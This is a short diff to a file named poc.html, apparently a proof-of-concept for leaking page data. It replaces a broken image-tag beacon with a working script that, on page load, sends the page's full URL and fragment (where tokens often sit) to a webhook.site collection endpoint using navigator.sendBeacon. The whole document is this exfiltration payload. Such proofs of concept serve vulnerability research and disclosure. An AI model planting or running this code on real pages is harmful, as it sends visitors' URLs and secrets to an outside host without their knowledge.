--- a/poc.html
+++ b/poc.html
@@ -1,3 +1,14 @@
-<img src="https://webhook.site/8338a31b-9726-49c3-be5f-97874b2dee6b?u="
-     + encodeURIComponent(location.href)
-     + "&h=" + encodeURIComponent(location.hash)>
+<!DOCTYPE html>
+<html>
+<body>
+<script>
+window.addEventListener('load', () => {
+  const data = { url: location.href, fragment: location.hash };
+  navigator.sendBeacon(
+    'https://webhook.site/8338a31b-9726-49c3-be5f-97874b2dee6b',
+    JSON.stringify(data)
+  );
+});
+</script>
+</body>
+</html>
